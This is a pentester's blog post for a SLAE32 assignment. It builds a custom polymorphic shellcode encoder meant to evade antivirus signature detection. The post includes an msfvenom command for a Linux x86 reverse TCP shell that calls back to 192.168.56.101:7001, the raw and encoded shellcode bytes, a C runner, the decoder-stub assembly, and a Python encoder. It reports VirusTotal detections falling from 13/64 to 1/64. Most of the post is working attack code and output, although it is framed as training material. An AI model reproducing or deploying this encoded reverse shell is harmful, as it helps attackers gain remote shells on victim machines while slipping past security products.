SLAE32 - Custom shellcode encoder - fzm.ooo— pentester and red teamer by day, security researcher and developer at night.

Introduction

In this post we are going to design and implement a custom polymorphic encoder, that utilizes a basic polymorphic engine to produce unique variations of the encoded shellcode copies, in order to minimize the chances of the shellcode being picked up as malicious when static analysis is performed on the binary by a security products.

Obviously, the goal of the encoder we are going to implement, is just showing how encoding well-known shellcodes, is a viable method to make detecting the shellcode harder when realying on signatures. This alone is almost certainly not enough to bypass modern EDRs, which doesn’t rely only on signatures, but also on several other factors to classify a file as malicious (especially in Windows world).

Enough with the ramblings, let’s dive into the code!

Original shellcode

To start off, we can use msfvenom to generate the shellcode for an unstaged TCP reverse shell for Linux x86 architecture.

$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=7001 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x38\x65\x68"
"\x02\x00\x1b\x59\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

We can then add the shellcode to the C template, and compile it with gcc.

unsigned char code[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x38\x65\x68"
"\x02\x00\x1b\x59\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

main() {
    int (*ret)() = (int(*)())code;
    ret();
}

$ gcc -w -fno-stack-protector -z execstack run_sc.c -o plain_sc

Finally we upload the resulting ELF binary to VirusTotal , in order to check what is the detection rate for the shellcode, prior to the encoding phase. As expected, the shellcode is flagged as malicious by a lot of engines.

VirusTotal analysis of plain shellcode

Encoding scheme

The encoder performs the following operations on the provided shellcode:

Adds NOPs padding at the end of the original shellcode, to make it 4-bytes aligned

Then, each chunk of 4 bytes is processed like so:

A random byte in range [0x01,0xff] is inserted before the 4-byte chunk
The 1st byte is negated using the NOT operator
The 2nd byte is xor’ed with the random byte
The 3rd byte is negated using the NOT operator
The 4th byte is xor’ed with the 2nd byte and with the random byte

The diagram below shows the encoding process in action:

Shellcode Decoder

The next step is writing a decoder stub, that retrieves the address of the string with the encoded shellcode via jmp-call-pop, and loops over it until the end marker byte is hit. At that point the shellcode is completely decoded, and the stub can just jump to the beginning of the shellcode, that will get executed by the victim host.

Since we don’t have our encoded shellcode yet, we can use a byte sequence of bytes from 0x01 to 0x09 so that we can easily identify the decoder stub and the encoded shellcode, in the decoder shellcode bytes dump.

We are also going to use 0xaa as end marker for now. The encoder script will take care of choosing the end marker value dynamically.

global _start

section .text
_start:
    jmp short to_decode

decode:
    pop esi                   ; addr of shellcode
    push esi
    pop edi                   ; copy of shellcode addr
    xor eax, eax
    xor ebx, ebx
    xor edx, edx

decode_loop:
    cmp byte [esi], 0xaa      ; compare with end marker
    je shellcode              ; jump to decoded shellcode

    mov al, byte [esi]		  ; make a copy of random byte

    xor byte [esi+1], 0xff    ; 1st byte: NOT
    mov bl, byte[esi+1]		  ;
    mov byte [edi], bl   	  ; move the 1st byte back in place

    xor byte [esi+2], al      ; 2nd byte: XORed with random byte (0th)
    mov bl, byte [esi+2]
    mov byte [edi+1], bl	  ; move the 2nd byte back in place

    xor byte [esi+3], 0xff    ; 3rd byte: NOT
    mov bl, byte[esi+3]		  ;
    mov byte [edi+2], bl	  ; move the 3rd byte back in place

                              ; 4th byte: XORed with 2nd byte XORed and with random byte
    mov dl, byte [edi+1]	  ; get the value of the decoded 2nd byte
    xor byte [esi+4], al 	  ; XOR with random byte
    xor byte [esi+4], dl      ; XOR with second decoded byte
    mov bl, byte [esi+4]
    mov byte [edi+3], bl      ; move the 4th byte back in place

    add esi, 0x05             ; move esi to the next block of shellcode
    add edi, 0x04		      ; move edi pointer for the decoded shellcode
    jmp short decode_loop     ; jmp back and keep decoding

to_decode:
    call decode
    shellcode: db 0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09

Encoder Implementation

The encoding scheme presented in the previous paragraphs, can be implemented by writing a python script, that:

takes the original shellcode and the decoder stub
encodes the original shellcode
replaces the end marker in the decoder stub with a byte that does not exists in the encoded shellcode
prepends the decoder stub to the encoded shellcode

#!/usr/bin/env python3

import sys
import random

...[snippet]...

def process_decoder(shellcode):
    missing_bytes = find_missing_bytes(shellcode)
    if len(missing_bytes) == 0:
        print('[!] ERROR. The encoder is not able to process this shellcode')
        sys.exit(1)

    end_marker_byte = random.choice(shellcode)
    print('[*] End marker: 0x%02x' % end_marker_byte)

    dec_stub = bytearray(b''.join([
        b'\xeb\x43\x5e\x56\x5f\x31\xc0\x31\xdb\x31\xd2\x80\x3e',
        bytes([end_marker_byte]),
        b'\x74\x3a\x8a\x06\x80\x76\x01\xff\x8a\x5e\x01\x88\x1f',
        b'\x30\x46\x02\x8a\x5e\x02\x88\x5f\x01\x80\x76\x03\xff',
        b'\x8a\x5e\x03\x88\x5f\x02\x8a\x57\x01\x30\x46\x04\x30',
        b'\x56\x04\x8a\x5e\x04\x88\x5f\x03\x83\xc6\x05\x83\xc7',
        b'\x04\xeb\xc6\xe8\xb8\xff\xff\xff'
        ])
    )

    return dec_stub, end_marker_byte

def encode_sc(shellcode):
    encoded_sc_esc = ''
    encoded_sc_0x  = ''
    enc_shellcode = bytearray()
    orig_shellcode_len = len(shellcode)

    dec_stub, end_marker = process_decoder(shellcode)

    if len(shellcode) % 4 != 0:
        print('[*] Adding padding to shellcode so its 4-byte aligned ...')
        shellcode = add_padding(shellcode)

    print('[*] Encoding shellcode ...')
    for i in range(0, len(shellcode), 4):
        # Prepend random byte each chunk of 4 bytes
        randbyte = end_marker
        while randbyte == end_marker:
            randbyte = random.randrange(0x01, 0xff)
        enc_shellcode.append(randbyte)

        # Processing chunks
        enc_shellcode.append(shellcode[i] ^ 0xff)
        enc_shellcode.append(shellcode[i+1] ^ randbyte)
        enc_shellcode.append(shellcode[i+2] ^ 0xff)
        enc_shellcode.append(shellcode[i+3] ^ shellcode[i+1] ^ randbyte)


    print('[*] Appending 0x%02x marker at the end of the encoded shellcode' % end_marker)
    enc_shellcode.append(end_marker)

    print('[*] New shellcode length: %s' % len(enc_shellcode))
    inc_rate = -100 + (len(enc_shellcode)) * 100 / orig_shellcode_len
    print('[*] Increase rate: %.02f %%' % inc_rate)

    # Check null bytes
    if has_nulls(enc_shellcode):
        print('[!] WARNING. There are null bytes in the shellcode!')
    else:
        print('[*] SUCCESS! There are no null bytes in the encoded shellcode!')

    return dec_stub+enc_shellcode


...[snippet]...

if __name__ == '__main__':

    # TCP reverse shell shellcode
    shellcode = bytearray(b''.join([
        b'\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66',
        b'\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0',
        b'\xa8\x38\x65\x68\x02\x00\x1b\x59\x89\xe1\xb0\x66\x50',
        b'\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73',
        b'\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0',
        b'\x0b\xcd\x80'
        ])
    )

    print('[*] Original shellcode lenght: %s' % len(shellcode))

    encoded_sc = encode_sc(shellcode)
    print_shellcode(encoded_sc)

The encoded shellcode can be generated by running the python script.

slae@Ubuntu32:~/SLAE-Assignments/A4$ ./encoder.py
[*] Original shellcode lenght: 68
[*] Found 217 bytes not in shellcode
[*] End marker: 0x68
[*] Encoding shellcode ...
[*] Appending 0x68 marker at the end of the encoded shellcode
[*] New shellcode length: 86
[*] Increase rate: 26.47 %
[*] SUCCESS! There are no null bytes in the encoded shellcode!

unsigned char code[] = (
"\xeb\x43\x5e\x56\x5f\x31\xc0\x31\xdb\x31\xd2\x80\x3e\x68\x74\x3a"
"\x8a\x06\x80\x76\x01\xff\x8a\x5e\x01\x88\x1f\x30\x46\x02\x8a\x5e"
"\x02\x88\x5f\x01\x80\x76\x03\xff\x8a\x5e\x03\x88\x5f\x02\x8a\x57"
"\x01\x30\x46\x04\x30\x56\x04\x8a\x5e\x04\x88\x5f\x03\x83\xc6\x05"
"\x83\xc7\x04\xeb\xc6\xe8\xb8\xff\xff\xff\xf4\x6f\x64\x6f\x55\xd3"
"\x24\x24\x1c\x77\x62\xbc\x31\x95\x33\x6b\x76\x8a\x4f\xec\xe1\x32"
"\x61\x6c\x38\x7c\x4f\x43\x32\xc3\xf1\xb6\x88\x06\xe0\xe3\x3f\x4b"
"\xc7\x2e\x2a\x97\x28\xff\x33\x74\xa6\xfd\x1e\x4d\x41\x99\x11\xae"
"\x42\xe8\x4c\xeb\x76\x0a\x49\x32\xc9\xad\xa1\xfa\x91\xd5\x8c\xbd"
"\x82\x97\xad\xd0\xcf\xa6\x96\x2f\x1c\x7d\x70\xac\xf9\x1e\x49\x8e"
"\xf4\x43\x7f\xd3\x68"
);

Detection rate after encoding

We can now add the encoded shellcode to the C template, compile it with gcc, and upload the final ELF binary to VirusTotal, in order to verify that by using a custom encoder, we have successfully decreased the chances of getting our shellcode flagged as malware by AV engines.

unsigned char code[] = (
"\xeb\x43\x5e\x56\x5f\x31\xc0\x31\xdb\x31\xd2\x80\x3e\x68\x74\x3a"
"\x8a\x06\x80\x76\x01\xff\x8a\x5e\x01\x88\x1f\x30\x46\x02\x8a\x5e"
"\x02\x88\x5f\x01\x80\x76\x03\xff\x8a\x5e\x03\x88\x5f\x02\x8a\x57"
"\x01\x30\x46\x04\x30\x56\x04\x8a\x5e\x04\x88\x5f\x03\x83\xc6\x05"
"\x83\xc7\x04\xeb\xc6\xe8\xb8\xff\xff\xff\xf4\x6f\x64\x6f\x55\xd3"
"\x24\x24\x1c\x77\x62\xbc\x31\x95\x33\x6b\x76\x8a\x4f\xec\xe1\x32"
"\x61\x6c\x38\x7c\x4f\x43\x32\xc3\xf1\xb6\x88\x06\xe0\xe3\x3f\x4b"
"\xc7\x2e\x2a\x97\x28\xff\x33\x74\xa6\xfd\x1e\x4d\x41\x99\x11\xae"
"\x42\xe8\x4c\xeb\x76\x0a\x49\x32\xc9\xad\xa1\xfa\x91\xd5\x8c\xbd"
"\x82\x97\xad\xd0\xcf\xa6\x96\x2f\x1c\x7d\x70\xac\xf9\x1e\x49\x8e"
"\xf4\x43\x7f\xd3\x68"
);

main() {
    int (*ret)() = (int(*)())code;
    ret();
}

$ gcc -w -fno-stack-protector -z execstack run_sc.c -o enc_sc

VirusTotal analysis of encoded shellcode

The new executable is now detected as being potentially dangerous by just one engine (probably because of the template, rather than the shellcode).

Conclusion

Even though there’s still plenty of room for improvement, by obfuscating a very well-known shellcode sample with a custom encoder, the detection rate for the reverse shell shellcode dropped from 13/64 to 1/64.

If you want to check out the code for the encoder we created, you can check out the slae32 repository in my Github.

Thank you for reading!

SLAE32 - Custom shellcode encoder

Introduction #

Original shellcode #

Encoding scheme #

Shellcode Decoder #

Encoder Implementation #

Detection rate after encoding #

Conclusion #